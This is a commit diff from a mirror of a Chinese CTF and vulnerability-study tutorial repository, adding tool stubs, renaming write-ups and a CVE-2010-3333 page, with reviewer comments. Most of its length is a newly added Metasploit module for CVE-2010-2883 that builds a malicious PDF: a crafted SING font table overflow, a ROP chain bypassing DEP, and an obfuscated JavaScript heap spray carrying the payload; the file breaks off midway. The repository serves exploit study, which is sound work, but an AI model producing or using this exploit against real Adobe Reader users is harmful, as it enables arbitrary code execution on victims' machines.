mirror of
https://github.com/nganhkhoa/CTF-All-In-One.git
synced 2025-01-27 05:57:33 +07:00
fix
This commit is contained in:
parent: 382cad2cdb
commit: 9c5d6239c3
@ -59,6 +59,7 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One
|
||||
* [2.4.4 binwalk](doc/2.4.4_binwalk.md)
|
||||
* [2.4.5 Burp Suite](doc/2.4.5_burpsuite.md)
|
||||
* [2.4.6 Wireshark](doc/2.4.6_wireshark.md)
|
||||
* [2.4.7 Cuckoo Sandbox](doc/2.4.7_cuckoo.md)
|
||||
* [三、分类专题篇](doc/3_topics.md)
|
||||
* Pwn
|
||||
* [3.1.1 格式化字符串漏洞](doc/3.1.1_format_string.md)
|
||||
@ -156,10 +157,11 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One
|
||||
* Reverse
|
||||
* [6.2.1 re XHPCTF2017 dont_panic](doc/6.2.1_re_xhpctf2017_dont_panic.md)
|
||||
* [6.2.2 re ECTF2016 tayy](doc/6.2.2_re_ectf2016_tayy.md)
|
||||
* [6.2.3 re Codegate2017 angrybird](doc/6.2.3_re_codegate2017_angrybird.md)
|
||||
* [6.2.3 re CodegateCTF2017 angrybird](doc/6.2.3_re_codegatectf2017_angrybird.md)
|
||||
* [6.2.4 re CSAWCTF2015 wyvern](doc/6.2.4_re_csawctf2015_wyvern.md)
|
||||
* [6.2.5 re PicoCTF2014 Baleful](doc/6.2.5_re_picoctf2014_baleful.md)
|
||||
* [6.2.6 re SECCON2017 printf_machine](doc/6.2.6_re_seccon2017_printf_machine.md)
|
||||
* [6.2.6 re SECCONCTF2017 printf_machine](doc/6.2.6_re_secconctf2017_printf_machine.md)
|
||||
* [6.2.7 re CodegateCTF2018 RedVelvet](doc/6.2.7_re_codegatectf2018_redvelvet.md)
|
||||
* Web
|
||||
* [6.3.1 web HCTF2017 babycrack](doc/6.3.1_web_hctf2017_babycrack.md)
|
||||
* Crypto
|
||||
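Review bot: the renames here (6.2.3 Codegate2017 to CodegateCTF2017, 6.2.6 SECCON2017 to SECCONCTF2017) only change the doc file names, yet the write-ups in this commit move their download links to ../src/writeup/6.2.3_re_codegatectf2017_angrybird and ../src/writeup/6.2.6_re_secconctf2017_printf_machine; no rename of those two src/writeup directories appears anywhere in the diff shown, so confirm the directories were moved as well or both download links will dangle.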
@ -175,7 +177,7 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One
|
||||
* [7.1.6 CVE-2017-9430 DNSTracer 栈溢出漏洞](doc/7.1.6_dnstracer_2017-9430.md)
|
||||
* [7.1.7 CVE-2018-6323 GNU binutils elf_object_p 整型溢出漏洞](doc/7.1.7_binutils_2018-6323.md)
|
||||
* [7.1.8 CVE-2010-2883 Adobe CoolType SING 表栈溢出漏洞](doc/7.1.8_adobe_reader_2010-2883.md)
|
||||
* [7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞](doc/7.1.9_ms_word_2010-2333.md)
|
||||
* [7.1.9 CVE-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞](doc/7.1.9_ms_word_2010-3333.md)
|
||||
* Malware
|
||||
* [八、学术篇](doc/8_academic.md)
|
||||
* [8.1 The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)](doc/8.1_ret2libc_without_func_calls.md)
|
||||
|
@ -1,10 +1,21 @@
|
||||
# 2.3.2 OllyDbg 调试器
|
||||
|
||||
- [快捷键](#快捷键)
|
||||
- [命令行插件](#命令行插件)
|
||||
- [参考资料](#参考资料)
|
||||
|
||||
|
||||
## 快捷键
|
||||
- F2:在光标选定位置按 F2 键设置或取消断点。
|
||||
- F4:运行到光标选定位置处暂停。
|
||||
- F7:单步步入:每次执行一条指令,遇到 call 等子程序时进入其中。
|
||||
- F8:单步步过,每次执行一条指令,遇到 call 等子程序时不进入其中。
|
||||
- F9:运行,被调试软件继续运行,直到遇到下一个断点。
|
||||
- Ctrl+F9:执行到返回,在执行到一个 ret 指令时暂停,常用于从当前函数快速返回到上一个函数。
|
||||
- Alt+F9:执行到用户代码,可用于从系统部分快速返回到被调试程序部分。
|
||||
|
||||
|
||||
## 命令行插件
|
||||
|
||||
## 参考资料
|
||||
- http://www.ollydbg.de/
|
||||
|
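Review bot: the 命令行插件 section is an empty heading that the new TOC entry links to; either add its content or leave the entry out until there is some. Minor: the F7 item uses a colon after 单步步入 while the F8 item uses a comma after 单步步过, so the two parallel descriptions are punctuated differently.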
13
doc/2.4.7_cuckoo.md
Normal file

@ -0,0 +1,13 @@
|
||||
# 2.4.7 Cuckoo Sandbox
|
||||
|
||||
- [简介](#简介)
|
||||
- [安装](#安装)
|
||||
- [参考资料](#参考资料)
|
||||
|
||||
|
||||
## 简介
|
||||
|
||||
## 安装
|
||||
|
||||
## 参考资料
|
||||
- https://cuckoosandbox.org/
|
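Review bot: 简介 and 安装 are empty headings, but the README and 2_tools.md hunks in this commit already link to this file as a finished tool entry; a one-line description under 简介 (what Cuckoo Sandbox is and what it is used for) would stop those links landing on an empty page, or mark the file as a stub.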
@ -24,3 +24,4 @@
|
||||
* [2.4.4 binwalk](2.4.4_binwalk.md)
|
||||
* [2.4.5 Burp Suite](2.4.5_burpsuite.md)
|
||||
* [2.4.6 Wireshark](2.4.6_wireshark.md)
|
||||
* [2.4.7 Cuckoo Sandbox](2.4.7_cuckoo.md)
|
||||
|
@ -23,7 +23,6 @@
|
||||
```
|
||||
$ git clone https://github.com/Z3Prover/z3.git
|
||||
$ cd z3
|
||||
|
||||
$ python scripts/mk_make.py --python
|
||||
$ cd build
|
||||
$ make
|
||||
|
@ -2,5 +2,7 @@
|
||||
|
||||
- [参考资料](#参考资料)
|
||||
|
||||
|
||||
## 参考资料
|
||||
- [Quick introduction into SAT/SMT solvers and symbolic execution](https://yurichev.com/writings/SAT_SMT_draft-EN.pdf)
|
||||
- [Practical Symbolic Execution and SATisfiability Module Theories (SMT) 101](http://deniable.org/reversing/symbolic-execution)
|
||||
|
@ -1,10 +1,10 @@
|
||||
# 6.2.3 re Codegate2017 angrybird
|
||||
# 6.2.3 re CodegateCTF2017 angrybird
|
||||
|
||||
- [题目解析](#题目解析)
|
||||
- [参考资料](#参考资料)
|
||||
|
||||
|
||||
[下载文件](../src/writeup/6.2.3_re_codegate2017_angrybird)
|
||||
[下载文件](../src/writeup/6.2.3_re_codegatectf2017_angrybird)
|
||||
|
||||
## 题目解析
|
||||
看题目就知道,这是一个会让我们抓狂的程序,事实也确实如此。
|
||||
@ -266,3 +266,4 @@ you typed : Im_so_cute&pretty_:)
|
||||
|
||||
|
||||
## 参考资料
|
||||
- https://ctftime.org/task/3375
|
@ -1,10 +1,10 @@
|
||||
# 6.2.6 re SECCON2017 printf_machine
|
||||
# 6.2.6 re SECCONCTF2017 printf_machine
|
||||
|
||||
- [题目解析](#题目解析)
|
||||
- [参考资料](#参考资料)
|
||||
|
||||
|
||||
[下载文件](../src/writeup/6.2.6_re_seccon2017_printf_machine)
|
||||
[下载文件](../src/writeup/6.2.6_re_secconctf2017_printf_machine)
|
||||
|
||||
## 题目解析
|
||||
```
|
||||
@ -14,4 +14,5 @@ fsmachine: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically l
|
||||
|
||||
|
||||
## 参考资料
|
||||
- https://ctftime.org/task/5042
|
||||
- [400_printf_machine](https://github.com/SECCON/SECCON2017_online_CTF/tree/master/binary/400_printf_machine)
|
17
doc/6.2.7_re_codegatectf2018_redvelvet.md
Normal file
@ -0,0 +1,17 @@
|
||||
# 6.2.7 re CodegateCTF2018 RedVelvet
|
||||
|
||||
- [题目解析](#题目解析)
|
||||
- [参考资料](#参考资料)
|
||||
|
||||
|
||||
[下载文件](../src/writeup/6.2.7_re_codegatectf2018_redvelvet)
|
||||
|
||||
## 题目解析
|
||||
```
|
||||
$ file RedVelvet
|
||||
RedVelvet: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=84e7ef91c33878cf9eefc00a7a450895aa573494, not stripped
|
||||
```
|
||||
|
||||
|
||||
## 参考资料
|
||||
- https://ctftime.org/task/5231
|
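Review bot: 题目解析 contains only the `file` output and the 参考资料 link; the `not stripped` in that output deserves a sentence, since it means symbol names are available when reading the binary, and the analysis itself is still missing, so mark the section as unfinished or complete it before 6_writeup.md links to it.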
@ -4,6 +4,8 @@
|
||||
- [解题流程](#解题流程)
|
||||
|
||||
|
||||
[下载文件](../src/writeup/6.3.1_web_hctf2017_babycrack)
|
||||
|
||||
## 题目解析
|
||||
题目就不用多说了,很容易发现是 JavaScript 代码审计。
|
||||
|
||||
|
@ -32,10 +32,11 @@
|
||||
* Reverse
|
||||
* [6.2.1 re XHPCTF2017 dont_panic](6.2.1_re_xhpctf2017_dont_panic.md)
|
||||
* [6.2.2 re ECTF2016 tayy](6.2.2_re_ectf2016_tayy.md)
|
||||
* [6.2.3 re Codegate2017 angrybird](6.2.3_re_codegate2017_angrybird.md)
|
||||
* [6.2.3 re CodegateCTF2017 angrybird](6.2.3_re_codegatectf2017_angrybird.md)
|
||||
* [6.2.4 re CSAWCTF2015 wyvern](6.2.4_re_csawctf2015_wyvern.md)
|
||||
* [6.2.5 re PicoCTF2014 Baleful](6.2.5_re_picoctf2014_baleful.md)
|
||||
* [6.2.6 re SECCON2017 printf_machine](6.2.6_re_seccon2017_printf_machine.md)
|
||||
* [6.2.6 re SECCONCTF2017 printf_machine](6.2.6_re_secconctf2017_printf_machine.md)
|
||||
* [6.2.7 re CodegateCTF2018 RedVelvet](6.2.7_re_codegatectf2018_redvelvet.md)
|
||||
* Web
|
||||
* [6.3.1 web HCTF2017 babycrack](6.3.1_web_hctf2017_babycrack.md)
|
||||
* Crypto
|
||||
|
@ -17,6 +17,7 @@ Adobe Reader 和 Acrobat 9.4 之前版本的 CoolType.dll 中存在基于栈的
|
||||
| --- | --- | --- |
|
||||
| 操作系统 | Windows XP SP3 | 体系结构:32 位 |
|
||||
| 调试器 | OllyDbg | 版本号:吾爱专版 |
|
||||
| 反汇编器 | IDA Pro | 版本号:6.8 |
|
||||
| 漏洞软件 | Adobe Reader | 版本号:9.3.4 |
|
||||
|
||||
我们利用 Metasploit 来生成攻击样本:
|
||||
|
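Review bot: the new sentence '我们利用 Metasploit 来生成攻击样本:' ends with a colon but nothing follows it; name the module here, since this commit adds it as src/exploit/7.1.8_adobe_reader_2010-2883/adobe_cooltype_sing.rb together with cve-2010-2883.ttf, and note that the table's Adobe Reader 9.3.4 on Windows XP SP3 matches one of the tested combinations listed in that module's Targets comments.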
@ -1,18 +0,0 @@
|
||||
# 7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞
|
||||
|
||||
- [漏洞描述](#漏洞描述)
|
||||
- [漏洞复现](#漏洞复现)
|
||||
- [漏洞分析](#漏洞分析)
|
||||
- [参考资料](#参考资料)
|
||||
|
||||
|
||||
[下载文件](../src/exploit/7.1.9_ms_word_2010-2333)
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
## 漏洞分析
|
||||
|
||||
## 参考资料
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2333
|
29
doc/7.1.9_ms_word_2010-3333.md
Normal file
@ -0,0 +1,29 @@
|
||||
# 7.1.9 cve-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞
|
||||
|
||||
- [漏洞描述](#漏洞描述)
|
||||
- [漏洞复现](#漏洞复现)
|
||||
- [漏洞分析](#漏洞分析)
|
||||
- [参考资料](#参考资料)
|
||||
|
||||
|
||||
[下载文件](../src/exploit/7.1.9_ms_word_2010-3333)
|
||||
|
||||
## 漏洞描述
|
||||
cve-2010-3333 漏洞是一个栈溢出漏洞,该漏洞是由于 Microsoft Office 软件中的 Open XML 文件格式转换器在处理 RTF 中的 "pFragments" 属性时存在栈溢出,可能导致任意代码执行。受影响的版本有:MS Office 2003 SP3、Office 2007 SP0、Office 2010 等。
|
||||
|
||||
|
||||
## 漏洞复现
|
||||
| |推荐使用的环境 | 备注 |
|
||||
| --- | --- | --- |
|
||||
| 操作系统 | Windows XP SP3 | 体系结构:32 位 |
|
||||
| 调试器 | OllyDbg | 版本号:吾爱专版 |
|
||||
| 反汇编器 | IDA Pro | 版本号:7.0 |
|
||||
| 漏洞软件 | MS Office | 版本号:2003 SP3 |
|
||||
|
||||
我们利用 Metasploit 来生成攻击样本
|
||||
|
||||
|
||||
## 漏洞分析
|
||||
|
||||
## 参考资料
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2333
|
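Review bot: the reference link at the end still points at https://www.cvedetails.com/cve/CVE-2010-2333, the wrong identifier this commit renames away from; it should read CVE-2010-3333, which is also the CVE the included Metasploit module references. Two smaller points: the heading and the first sentence write 'cve-2010-3333' in lowercase while the TOC entries use 'CVE-2010-3333', and '我们利用 Metasploit 来生成攻击样本' lacks the trailing colon the matching sentence in 7.1.8_adobe_reader_2010-2883.md has, while 漏洞分析 is still an empty section.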
@ -9,5 +9,5 @@
|
||||
* [7.1.6 CVE-2017-9430 DNSTracer 栈溢出漏洞](7.1.6_dnstracer_2017-9430.md)
|
||||
* [7.1.7 CVE-2018-6323 GNU binutils elf_object_p 整型溢出漏洞](7.1.7_binutils_2018-6323.md)
|
||||
* [7.1.8 CVE-2010-2883 Adobe CoolType SING 表栈溢出漏洞](7.1.8_adobe_reader_2010-2883.md)
|
||||
* [7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞](7.1.9_ms_word_2010-2333.md)
|
||||
* [7.1.9 CVE-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞](7.1.9_ms_word_2010-3333.md)
|
||||
* Malware
|
||||
|
562
src/exploit/7.1.8_adobe_reader_2010-2883/adobe_cooltype_sing.rb
Normal file
@ -0,0 +1,562 @@
|
||||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'zlib'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table
|
||||
handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are
|
||||
assumed to be vulnerable as well.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Unknown', # 0day found in the wild
|
||||
'sn0wfl0w', # initial analysis, also @vicheck on twitter
|
||||
'jduck' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-2883' ],
|
||||
[ 'OSVDB', '67849'],
|
||||
[ 'URL', 'http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html' ],
|
||||
[ 'URL', 'http://www.adobe.com/support/security/advisories/apsa10-02.html' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00",
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# Tested OK via Adobe Reader 9.3.4 on Windows XP SP3 -jjd
|
||||
# Tested OK via Adobe Reader 9.3.4 on Windows 7 -jjd
|
||||
# Tested OK via Adobe Reader 9.3 on XP and 7 -todb
|
||||
[ 'Automatic', { }],
|
||||
],
|
||||
'DisclosureDate' => 'Sep 07 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
|
||||
])
|
||||
end
|
||||
|
||||
def exploit
|
||||
ttf_data = make_ttf()
|
||||
|
||||
js_data = make_js(payload.encoded)
|
||||
|
||||
# Create the pdf
|
||||
pdf = make_pdf(ttf_data, js_data)
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file...")
|
||||
|
||||
file_create(pdf)
|
||||
end
|
||||
|
||||
def make_ttf
|
||||
ttf_data = ""
|
||||
|
||||
# load the static ttf file
|
||||
|
||||
# NOTE: The 0day used Vera.ttf (785d2fd45984c6548763ae6702d83e20)
|
||||
path = File.join( Msf::Config.data_directory, "exploits", "cve-2010-2883.ttf" )
|
||||
fd = File.open( path, "rb" )
|
||||
ttf_data = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
|
||||
# Build the SING table
|
||||
sing = ''
|
||||
sing << [
|
||||
0, 1, # tableVersionMajor, tableVersionMinor (0.1)
|
||||
0xe01, # glyphletVersion
|
||||
0x100, # embeddingInfo
|
||||
0, # mainGID
|
||||
0, # unitsPerEm
|
||||
0, # vertAdvance
|
||||
0x3a00 # vertOrigin
|
||||
].pack('vvvvvvvv')
|
||||
# uniqueName
|
||||
# "The uniqueName string must be a string of at most 27 7-bit ASCII characters"
|
||||
#sing << "A" * (0x254 - sing.length)
|
||||
sing << rand_text(0x254 - sing.length)
|
||||
|
||||
# 0xffffffff gets written here @ 0x7001400 (in BIB.dll)
|
||||
sing[0x140, 4] = [0x4a8a08e2 - 0x1c].pack('V')
|
||||
|
||||
# This becomes our new EIP (puts esp to stack buffer)
|
||||
ret = 0x4a80cb38 # add ebp, 0x794 / leave / ret
|
||||
sing[0x208, 4] = [ret].pack('V')
|
||||
|
||||
# This becomes the new eip after the first return
|
||||
ret = 0x4a82a714
|
||||
sing[0x18, 4] = [ret].pack('V')
|
||||
|
||||
# This becomes the new esp after the first return
|
||||
esp = 0x0c0c0c0c
|
||||
sing[0x1c, 4] = [esp].pack('V')
|
||||
|
||||
# Without the following, sub_801ba57 returns 0.
|
||||
sing[0x24c, 4] = [0x6c].pack('V')
|
||||
|
||||
ttf_data[0xec, 4] = "SING"
|
||||
ttf_data[0x11c, sing.length] = sing
|
||||
|
||||
ttf_data
|
||||
end
|
||||
|
||||
def make_js(encoded_payload)
|
||||
|
||||
# The following executes a ret2lib using icucnv36.dll
|
||||
# The effect is to bypass DEP and execute the shellcode in an indirect way
|
||||
stack_data = [
|
||||
0x41414141, # unused
|
||||
0x4a8063a5, # pop ecx / ret
|
||||
0x4a8a0000, # becomes ecx
|
||||
|
||||
0x4a802196, # mov [ecx],eax / ret # save whatever eax starts as
|
||||
|
||||
0x4a801f90, # pop eax / ret
|
||||
0x4a84903c, # becomes eax (import for CreateFileA)
|
||||
|
||||
# -- call CreateFileA
|
||||
0x4a80b692, # jmp [eax]
|
||||
|
||||
0x4a801064, # ret
|
||||
|
||||
0x4a8522c8, # first arg to CreateFileA (lpFileName / pointer to "iso88591")
|
||||
0x10000000, # second arg - dwDesiredAccess
|
||||
0x00000000, # third arg - dwShareMode
|
||||
0x00000000, # fourth arg - lpSecurityAttributes
|
||||
0x00000002, # fifth arg - dwCreationDisposition
|
||||
0x00000102, # sixth arg - dwFlagsAndAttributes
|
||||
0x00000000, # seventh arg - hTemplateFile
|
||||
|
||||
0x4a8063a5, # pop ecx / ret
|
||||
0x4a801064, # becomes ecx
|
||||
|
||||
0x4a842db2, # xchg eax,edi / ret
|
||||
|
||||
0x4a802ab1, # pop ebx / ret
|
||||
0x00000008, # becomes ebx - offset to modify
|
||||
|
||||
#
|
||||
# This points at a neat-o block of code that ... TBD
|
||||
#
|
||||
# and [esp+ebx*2],edi
|
||||
# jne check_slash
|
||||
# ret_one:
|
||||
# mov al,1
|
||||
# ret
|
||||
# check_slash:
|
||||
# cmp al,0x2f
|
||||
# je ret_one
|
||||
# cmp al,0x41
|
||||
# jl check_lower
|
||||
# cmp al,0x5a
|
||||
# jle check_ptr
|
||||
# check_lower:
|
||||
# cmp al,0x61
|
||||
# jl ret_zero
|
||||
# cmp al,0x7a
|
||||
# jg ret_zero
|
||||
# cmp [ecx+1],0x3a
|
||||
# je ret_one
|
||||
# ret_zero:
|
||||
# xor al,al
|
||||
# ret
|
||||
#
|
||||
|
||||
0x4a80a8a6, # execute fun block
|
||||
|
||||
0x4a801f90, # pop eax / ret
|
||||
0x4a849038, # becomes eax (import for CreateFileMappingA)
|
||||
|
||||
# -- call CreateFileMappingA
|
||||
0x4a80b692, # jmp [eax]
|
||||
|
||||
0x4a801064, # ret
|
||||
|
||||
0xffffffff, # arguments to CreateFileMappingA, hFile
|
||||
0x00000000, # lpAttributes
|
||||
0x00000040, # flProtect
|
||||
0x00000000, # dwMaximumSizeHigh
|
||||
0x00010000, # dwMaximumSizeLow
|
||||
0x00000000, # lpName
|
||||
|
||||
0x4a8063a5, # pop ecx / ret
|
||||
0x4a801064, # becomes ecx
|
||||
|
||||
0x4a842db2, # xchg eax,edi / ret
|
||||
|
||||
0x4a802ab1, # pop ebx / ret
|
||||
0x00000008, # becomes ebx - offset to modify
|
||||
|
||||
0x4a80a8a6, # execute fun block
|
||||
|
||||
0x4a801f90, # pop eax / ret
|
||||
0x4a849030, # becomes eax (import for MapViewOfFile
|
||||
|
||||
# -- call MapViewOfFile
|
||||
0x4a80b692, # jmp [eax]
|
||||
|
||||
0x4a801064, # ret
|
||||
|
||||
0xffffffff, # args to MapViewOfFile - hFileMappingObject
|
||||
0x00000022, # dwDesiredAccess
|
||||
0x00000000, # dwFileOffsetHigh
|
||||
0x00000000, # dwFileOffsetLow
|
||||
0x00010000, # dwNumberOfBytesToMap
|
||||
|
||||
0x4a8063a5, # pop ecx / ret
|
||||
0x4a8a0004, # becomes ecx - writable pointer
|
||||
|
||||
0x4a802196, # mov [ecx],eax / ret - save map base addr
|
||||
|
||||
0x4a8063a5, # pop ecx / ret
|
||||
0x4a801064, # becomes ecx - ptr to ret
|
||||
|
||||
0x4a842db2, # xchg eax,edi / ret
|
||||
|
||||
0x4a802ab1, # pop ebx / ret
|
||||
0x00000030, # becomes ebx - offset to modify
|
||||
|
||||
0x4a80a8a6, # execute fun block
|
||||
|
||||
0x4a801f90, # pop eax / ret
|
||||
0x4a8a0004, # becomes eax - saved file mapping ptr
|
||||
|
||||
0x4a80a7d8, # mov eax,[eax] / ret - load saved mapping ptr
|
||||
|
||||
0x4a8063a5, # pop ecx / ret
|
||||
0x4a801064, # becomes ecx - ptr to ret
|
||||
|
||||
0x4a842db2, # xchg eax,edi / ret
|
||||
|
||||
0x4a802ab1, # pop ebx / ret
|
||||
0x00000020, # becomes ebx - offset to modify
|
||||
|
||||
0x4a80a8a6, # execute fun block
|
||||
|
||||
0x4a8063a5, # pop ecx / ret
|
||||
0x4a801064, # becomes ecx - ptr to ret
|
||||
|
||||
0x4a80aedc, # lea edx,[esp+0xc] / push edx / push eax / push [esp+0xc] / push [0x4a8a093c] / call ecx / add esp, 0x10 / ret
|
||||
|
||||
0x4a801f90, # pop eax / ret
|
||||
0x00000034, # becomes eax
|
||||
|
||||
0x4a80d585, # add eax,edx / ret
|
||||
|
||||
0x4a8063a5, # pop ecx / ret
|
||||
0x4a801064, # becomes ecx - ptr to ret
|
||||
|
||||
0x4a842db2, # xchg eax,edi / ret
|
||||
|
||||
0x4a802ab1, # pop ebx / ret
|
||||
0x0000000a, # becomes ebx - offset to modify
|
||||
|
||||
0x4a80a8a6, # execute fun block
|
||||
|
||||
0x4a801f90, # pop eax / ret
|
||||
0x4a849170, # becomes eax (import for memcpy)
|
||||
|
||||
# -- call memcpy
|
||||
0x4a80b692, # jmp [eax]
|
||||
|
||||
0xffffffff, # this stuff gets overwritten by the block at 0x4a80aedc, becomes ret from memcpy
|
||||
0xffffffff, # becomes first arg to memcpy (dst)
|
||||
0xffffffff, # becomes second arg to memcpy (src)
|
||||
0x00001000, # becomes third arg to memcpy (length)
|
||||
#0x0000258b, # ??
|
||||
#0x4d4d4a8a, # ??
|
||||
].pack('V*')
|
||||
|
||||
var_unescape = rand_text_alpha(rand(100) + 1)
|
||||
var_shellcode = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_start = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_s = 0x10000
|
||||
var_c = rand_text_alpha(rand(100) + 1)
|
||||
var_b = rand_text_alpha(rand(100) + 1)
|
||||
var_d = rand_text_alpha(rand(100) + 1)
|
||||
var_3 = rand_text_alpha(rand(100) + 1)
|
||||
var_i = rand_text_alpha(rand(100) + 1)
|
||||
var_4 = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
payload_buf = ''
|
||||
payload_buf << stack_data
|
||||
payload_buf << encoded_payload
|
||||
|
||||
escaped_payload = Rex::Text.to_unescape(payload_buf)
|
||||
|
||||
js = %Q|
|
||||
var #{var_unescape} = unescape;
|
||||
var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );
|
||||
var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
|
||||
while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};
|
||||
#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);
|
||||
#{var_b} += #{var_shellcode};
|
||||
#{var_b} += #{var_c};
|
||||
#{var_d} = #{var_b}.substring(0, #{var_s}/2);
|
||||
while(#{var_d}.length < 0x80000) #{var_d} += #{var_d};
|
||||
#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);
|
||||
var #{var_4} = new Array();
|
||||
for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";
|
||||
|
|
||||
|
||||
js
|
||||
end
|
||||
|
||||
def random_non_ascii_string(count)
|
||||
result = ""
|
||||
count.times do
|
||||
result << (rand(128) + 128).chr
|
||||
end
|
||||
result
|
||||
end
|
||||
|
||||
def io_def(id)
|
||||
"%d 0 obj \n" % id
|
||||
end
|
||||
|
||||
def io_ref(id)
|
||||
"%d 0 R" % id
|
||||
end
|
||||
|
||||
|
||||
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
|
||||
def n_obfu(str)
|
||||
#return str
|
||||
result = ""
|
||||
str.scan(/./u) do |c|
|
||||
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
|
||||
result << "#%x" % c.unpack("C*")[0]
|
||||
else
|
||||
result << c
|
||||
end
|
||||
end
|
||||
result
|
||||
end
|
||||
|
||||
|
||||
def ascii_hex_whitespace_encode(str)
|
||||
result = ""
|
||||
whitespace = ""
|
||||
str.each_byte do |b|
|
||||
result << whitespace << "%02x" % b
|
||||
whitespace = " " * (rand(3) + 1)
|
||||
end
|
||||
result << ">"
|
||||
end
|
||||
|
||||
|
||||
def make_pdf(ttf, js)
|
||||
|
||||
#swf_name = rand_text_alpha(8 + rand(8)) + ".swf"
|
||||
|
||||
xref = []
|
||||
eol = "\n"
|
||||
endobj = "endobj" << eol
|
||||
|
||||
# Randomize PDF version?
|
||||
pdf = "%PDF-1.5" << eol
|
||||
pdf << "%" << random_non_ascii_string(4) << eol
|
||||
|
||||
# catalog
|
||||
xref << pdf.length
|
||||
pdf << io_def(1) << n_obfu("<<") << eol
|
||||
pdf << n_obfu("/Pages ") << io_ref(2) << eol
|
||||
pdf << n_obfu("/Type /Catalog") << eol
|
||||
pdf << n_obfu("/OpenAction ") << io_ref(11) << eol
|
||||
# The AcroForm is required to get icucnv36.dll to load
|
||||
pdf << n_obfu("/AcroForm ") << io_ref(13) << eol
|
||||
pdf << n_obfu(">>") << eol
|
||||
pdf << endobj
|
||||
|
||||
# pages array
|
||||
xref << pdf.length
|
||||
pdf << io_def(2) << n_obfu("<<") << eol
|
||||
pdf << n_obfu("/MediaBox ") << io_ref(3) << eol
|
||||
pdf << n_obfu("/Resources ") << io_ref(4) << eol
|
||||
pdf << n_obfu("/Kids [") << io_ref(5) << "]" << eol
|
||||
pdf << n_obfu("/Count 1") << eol
|
||||
pdf << n_obfu("/Type /Pages") << eol
|
||||
pdf << n_obfu(">>") << eol
|
||||
pdf << endobj
|
||||
|
||||
# media box
|
||||
xref << pdf.length
|
||||
pdf << io_def(3)
|
||||
pdf << "[0 0 595 842]" << eol
|
||||
pdf << endobj
|
||||
|
||||
# resources
|
||||
xref << pdf.length
|
||||
pdf << io_def(4)
|
||||
pdf << n_obfu("<<") << eol
|
||||
pdf << n_obfu("/Font ") << io_ref(6) << eol
|
||||
pdf << ">>" << eol
|
||||
pdf << endobj
|
||||
|
||||
# page 1
|
||||
xref << pdf.length
|
||||
pdf << io_def(5) << n_obfu("<<") << eol
|
||||
pdf << n_obfu("/Parent ") << io_ref(2) << eol
|
||||
pdf << n_obfu("/MediaBox ") << io_ref(3) << eol
|
||||
pdf << n_obfu("/Resources ") << io_ref(4) << eol
|
||||
pdf << n_obfu("/Contents [") << io_ref(8) << n_obfu("]") << eol
|
||||
pdf << n_obfu("/Type /Page") << eol
|
||||
pdf << n_obfu(">>") << eol # end obj dict
|
||||
pdf << endobj
|
||||
|
||||
# font
|
||||
xref << pdf.length
|
||||
pdf << io_def(6) << n_obfu("<<") << eol
|
||||
pdf << n_obfu("/F1 ") << io_ref(7) << eol
|
||||
pdf << ">>" << eol
|
||||
pdf << endobj
|
||||
|
||||
# ttf object
|
||||
xref << pdf.length
|
||||
pdf << io_def(7) << n_obfu("<<") << eol
|
||||
pdf << n_obfu("/Type /Font") << eol
|
||||
pdf << n_obfu("/Subtype /TrueType") << eol
|
||||
